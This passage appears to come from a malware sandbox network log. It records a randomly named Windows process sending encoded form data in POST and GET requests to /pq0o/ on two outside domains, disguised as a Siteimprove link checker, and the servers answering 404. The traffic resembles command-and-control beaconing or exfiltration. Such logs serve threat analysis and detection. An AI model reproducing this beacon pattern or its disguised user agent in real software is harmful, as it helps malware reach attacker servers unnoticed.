Apr 24, 2024 09:22:13.438235998 CEST	479	IN	HTTP/1.1 404 Not Found Date: Wed, 24 Apr 2024 07:22:12 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49758	195.242.88.141	80	2412	C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 09:22:16.310743093 CEST	10740	OUT	POST /pq0o/ HTTP/1.1 Host: www.unchainedventure.com Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.unchainedventure.com Content-Length: 10302 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.unchainedventure.com/pq0o/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com Data Raw: 46 34 39 68 73 3d 6c 77 59 66 6b 77 34 46 39 6e 47 4e 7a 4d 62 42 74 38 42 65 38 71 5a 30 46 36 50 55 30 74 38 5a 30 59 68 39 35 46 34 77 48 43 6e 65 47 68 4e 2b 39 38 6d 78 61 43 5a 31 6b 6f 7a 5a 74 74 75 4f 47 57 44 57 71 47 74 49 42 76 71 33 2f 52 53 78 2b 34 47 44 31 4d 51 68 64 79 72 31 4d 63 77 4c 33 32 32 41 5a 4d 39 64 79 38 6b 63 77 4e 59 7a 6a 53 2f 42 37 4f 61 78 4f 6d 2f 54 52 32 78 73 78 49 56 70 43 5a 68 4c 78 6c 7a 45 52 72 5a 6e 30 49 5a 79 7a 69 56 74 4d 4d 45 4d 6a 65 37 58 4b 36 6c 2f 5a 78 30 6a 37 43 6b 54 32 46 46 6d 2f 37 56 42 36 48 38 53 67 44 4c 32 55 34 46 61 4f 79 58 75 6d 6a 45 62 49 65 48 34 73 75 30 79 6f 59 75 50 78 42 6a 49 43 43 79 31 6b 5a 59 43 71 6a 4b 72 70 37 6a 34 4f 79 38 52 4a 6c 58 78 6f 43 34 6a 65 39 37 73 78 53 33 66 2b 71 4d 62 32 77 50 4a 45 50 37 56 6e 53 44 55 4c 47 41 6d 55 67 58 49 31 43 76 4b 45 47 31 6a 6b 44 31 63 66 32 36 79 4c 6c 72 31 79 52 73 30 4f 79 37 65 77 67 45 2f 6e 4c 67 7a 77 33 4a 41 44 58 35 78 4a 32 4f 4a 6f 36 37 45 73 4a 6a 31 2f 7a 56 6c 45 39 69 75 44 67 70 45 55 72 6b 42 47 61 6d 62 53 68 6c 65 68 70 65 79 4e 4a 4b 79 70 55 6a 46 72 6f 6e 38 73 79 7a 75 36 6a 44 4b 51 70 65 4b 7a 72 74 33 38 55 2f 76 4b 56 46 74 73 67 50 63 43 5a 6c 5a 6a 66 37 43 2b 50 78 64 76 48 61 67 6f 36 5a 37 78 56 44 63 50 55 74 57 62 31 75 72 57 56 32 76 47 47 67 71 2b 43 51 33 64 70 38 42 4a 71 6c 66 59 43 47 6a 59 57 57 37 63 2f 67 48 7a 53 66 2f 59 4a 41 72 5a 6c 61 36 6d 6a 50 4c 41 71 4e 75 48 62 2f 4a 45 57 65 33 52 34 61 42 30 54 4f 53 64 39 58 35 35 37 35 30 46 33 68 4a 79 2f 66 72 34 72 61 67 33 71 37 38 37 74 59 69 36 53 33 65 7a 6a 57 66 65 6e 74 54 66 72 45 42 6f 53 54 61 48 65 6b 35 77 49 76 4f 69 4f 6f 64 41 75 4e 70 59 76 71 56 46 58 4d 64 54 4d 71 65 64 61 32 78 57 41 51 33 49 35 4e 7a 6e 6c 76 4d 36 48 70 4a 2f 31 45 32 2f 70 39 73 37 79 73 58 77 46 34 6b 47 43 2f 58 4c 39 49 62 48 37 51 44 4f 43 36 57 4c 74 79 34 64 4d 4d 74 33 4e 42 2f 45 32 47 7a 68 4c 76 48 6e 42 78 74 52 2f 65 30 55 34 47 4e 61 70 58 78 48 57 77 49 74 4b 34 77 58 39 70 67 6c 54 64 4f 33 71 6b 41 36 49 58 5a 2f 52 47 43 66 56 63 62 78 31 67 50 58 6f 63 74 65 57 62 74 75 74 56 52 48 35 56 74 4e 2b 50 56 39 30 4e 64 4d 64 6c 37 75 2f 36 71 6a 5a 56 32 76 51 65 49 33 4e 4e 31 31 73 44 36 48 61 42 48 49 6d 37 47 37 2b 34 55 2b 39 59 68 75 2b 4f 4d 5a 47 55 47 69 4a 5a 4e 42 71 4e 55 6e 53 67 37 6c 4e 42 53 35 30 42 78 34 57 76 2f 43 48 56 57 59 36 33 47 6d 35 75 49 49 63 56 53 73 69 30 51 5a 6b 72 2b 41 50 34 59 6d 78 36 36 4f 51 57 47 56 43 30 78 55 41 5a 48 6d 7a 41 56 70 36 34 35 42 71 72 37 77 77 30 62 48 4e 50 30 47 77 32 5a 48 6a 31 44 44 55 79 75 56 50 67 61 52 5a 52 78 51 46 77 39 51 41 7a 4d 38 4b 5a 32 6f 78 73 39 2b 2f 72 35 51 39 4b 6a 4c 44 4e 56 2b 62 32 46 39 52 41 44 67 69 38 7a 68 70 4b 43 6f 59 70 52 54 72 56 49 61 65 45 42 5a 75 61 4f 2f 57 41 30 77 50 6e 72 74 57 49 31 64 6b 76 35 2f 61 6c 4e 6e 69 6e 78 6d 4d 33 64 4e 65 33 73 71 36 59 6a 44 38 38 75 2b 73 75 43 50 33 35 4b 2f 50 68 4a 38 56 79 43 58 4f 63 4f 61 42 2b 41 6f 32 74 2b 4b 30 65 47 6e 50 71 71 5a 37 48 41 68 38 4f 67 33 6b 74 44 44 2f 58 47 33 62 43 42 52 49 54 41 52 73 68 77 65 51 35 37 5a 52 45 2b 6f 73 62 73 6c 76 46 39 79 37 2b 6c 38 69 42 61 59 74 43 52 50 63 2b 31 48 63 63 6f 61 38 5a 7a 62 5a 66 44 42 4a 74 53 46 68 67 4e 76 67 36 61 68 41 36 50 41 34 78 45 36 33 71 31 47 70 44 31 46 57 59 64 72 4f 2b 7a 61 7a 30 4b 48 41 54 6e 36 6f 32 53 6b 78 6c 5a 71 4d 33 4f 47 46 42 71 46 51 4a 72 38 79 53 2f 33 6b 79 6c 72 2b 41 67 6c 61 69 43 51 68 37 79 4f 37 47 38 4f 38 79 44 66 46 57 66 6a 41 63 73 2b 79 34 6b 64 62 78 49 7a 49 68 78 76 78 73 6a 72 59 4f 62 71 48 6d 75 62 78 4d 4e 6d 6a 64 54 54 79 57 63 4f 6c 67 59 37 66 72 43 2b 34 34 5a 62 6a 6a 2b 2b 38 76 36 4a 65 6f 76 42 4a 36 79 59 32 6a 2b 4c 6a 43 74 57 41 47 43 4d 72 4f 45 77 55 64 6b 77 58 31 6d 47 73 45 44 59 4e 35 46 6e 63 7a 70 4b 53 61 35 68 48 41 41 49 35 31 54 69 78 72 4f 6c 2f 6e 5a 47 42 45 6a 36 42 2f 49 64 45 44 6a 55 55 33 37 49 76 77 4c 2b 43 63 51 52 62 7a 4e 58 2f 72 66 50 6f 5a 48 44 63 77 61 30 6f 70 65 74 5a 74 32 32 Data Ascii: F49hs=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
Apr 24, 2024 09:22:16.636907101 CEST	479	IN	HTTP/1.1 404 Not Found Date: Wed, 24 Apr 2024 07:22:15 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49759	195.242.88.141	80	2412	C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 09:22:19.172328949 CEST	366	OUT	GET /pq0o/?F49hs=oyw/nBwJ61bGycTt7MUH34VrSoK42dIQz9F/9DQxJwbLEg40x6X3ShxK/IPLtNyuGmfUrEEfHvul1hK0yfa95YoddznUFYR7i1LwCbVe0J8wy+lXuD76n/g=&9ZZXx=T6kxVZuXAVuH9J HTTP/1.1 Host: www.unchainedventure.com Accept: / Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com
Apr 24, 2024 09:22:19.498409986 CEST	479	IN	HTTP/1.1 404 Not Found Date: Wed, 24 Apr 2024 07:22:18 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49760	74.208.236.153	80	2412	C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 09:22:25.030217886 CEST	635	OUT	POST /pq0o/ HTTP/1.1 Host: www.klconstructions.net Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.klconstructions.net Content-Length: 202 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.klconstructions.net/pq0o/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com Data Raw: 46 34 39 68 73 3d 6b 30 6d 4d 2b 33 62 33 64 43 56 45 7a 4b 4c 4d 31 7a 45 7a 57 4c 78 4c 42 70 4a 37 2b 71 66 53 50 32 32 59 4c 67 42 61 44 64 39 76 33 56 61 4a 73 42 4f 37 2b 70 63 54 45 46 58 61 61 7a 42 52 6a 30 78 39 77 4b 35 32 39 4e 70 46 46 37 33 78 34 38 2b 6a 2f 50 67 70 46 43 62 76 4c 43 73 59 70 64 65 72 7a 55 6f 76 30 46 45 68 59 6b 6d 64 62 53 71 72 64 4e 32 6c 48 5a 47 61 6e 36 50 33 6a 30 34 48 64 4a 4b 48 65 6f 4a 4b 65 5a 62 6e 50 5a 6b 50 79 52 76 6c 56 2f 41 41 5a 54 33 31 55 32 32 54 75 39 4d 4d 66 4e 49 79 71 34 6a 4a 6e 43 39 2f 63 36 77 37 52 6f 48 6b 70 77 4d 36 68 77 3d 3d Data Ascii: F49hs=k0mM+3b3dCVEzKLM1zEzWLxLBpJ7+qfSP22YLgBaDd9v3VaJsBO7+pcTEFXaazBRj0x9wK529NpFF73x48+j/PgpFCbvLCsYpderzUov0FEhYkmdbSqrdN2lHZGan6P3j04HdJKHeoJKeZbnPZkPyRvlV/AAZT31U22Tu9MMfNIyq4jJnC9/c6w7RoHkpwM6hw==
Apr 24, 2024 09:22:25.235002995 CEST	580	IN	HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Wed, 24 Apr 2024 07:22:25 GMT Server: Apache Content-Encoding: gzip Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R\|V}cplxXU*!6pBNI+MteRFSYj[7\|QqY3k\|G;,^{NPPouvw2O7.e(O~Nt^,G\|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49761	74.208.236.153	80	2412	C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 09:22:27.764883995 CEST	655	OUT	POST /pq0o/ HTTP/1.1 Host: www.klconstructions.net Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.klconstructions.net Content-Length: 222 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.klconstructions.net/pq0o/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com Data Raw: 46 34 39 68 73 3d 6b 30 6d 4d 2b 33 62 33 64 43 56 45 7a 72 37 4d 36 77 73 7a 51 72 78 4b 4f 4a 4a 37 30 4b 66 57 50 32 79 59 4c 68 55 43 44 76 70 76 32 30 71 4a 76 41 4f 37 77 4a 63 54 52 31 58 62 65 7a 42 4b 6a 30 38 41 77 50 42 32 39 4e 4e 46 46 37 48 78 35 50 57 38 2b 66 67 76 49 69 62 74 46 69 73 59 70 64 65 72 7a 51 35 41 30 46 4d 68 59 78 75 64 4a 6a 71 6f 54 74 32 36 52 4a 47 61 6a 36 50 37 6a 30 35 67 64 4e 53 35 65 71 42 4b 65 63 66 6e 50 6f 6b 4d 6f 42 76 6e 59 66 42 41 57 42 44 78 54 32 4c 51 68 65 63 52 57 38 4e 55 76 2b 79 54 32 7a 63 6f 4f 36 55 49 4d 76 4f 51 6b 7a 78 7a 36 32 51 46 74 49 46 6c 37 2b 71 46 76 31 6d 34 4f 70 30 7a 51 6b 38 3d Data Ascii: F49hs=k0mM+3b3dCVEzr7M6wszQrxKOJJ70KfWP2yYLhUCDvpv20qJvAO7wJcTR1XbezBKj08AwPB29NNFF7Hx5PW8+fgvIibtFisYpderzQ5A0FMhYxudJjqoTt26RJGaj6P7j05gdNS5eqBKecfnPokMoBvnYfBAWBDxT2LQhecRW8NUv+yT2zcoO6UIMvOQkzxz62QFtIFl7+qFv1m4Op0zQk8=
Apr 24, 2024 09:22:27.971296072 CEST	580	IN	HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Wed, 24 Apr 2024 07:22:27 GMT Server: Apache Content-Encoding: gzip Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 